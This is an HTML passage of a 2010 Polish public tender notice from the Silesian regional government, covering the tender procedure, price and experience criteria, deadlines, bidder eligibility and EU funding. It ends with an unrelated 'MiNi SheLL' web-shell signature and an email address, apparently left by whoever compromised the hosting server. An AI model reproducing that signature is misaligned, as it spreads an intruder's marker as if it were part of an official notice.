<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie Wykonawcy - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.silesia-region.pl/index.php?grupa=2<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Śląskiego
Wydział Zamówień Publicznych i Nadzoru Właścicielskiego
ul. Ligonia 46
40-037 Katowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2010 godzina 12:30, miejsce: Urząd Marszałkowski Województwa Śląskiego
Kancelaria Ogólna p. 164
ul. Ligonia 46
40-037 Katowice.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy wykażą brak podstaw do wykluczenia z postępowania o udzielenie zamówienia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Prawo zamówień publicznych.
2. Ocena spełniania ww. warunku udziału w postępowaniu, zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów, wymienionych w pkt III.4.2).
Nie wykazanie spełniania ww. warunku skutkować będzie wykluczeniem Wykonawcy
z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.
3. Wykonawca może polegać na wiedzy i doświadczeniu oraz osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących ich stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia.
W tym celu Wykonawca winien dołączyć do oferty w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
4. Projekt finansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com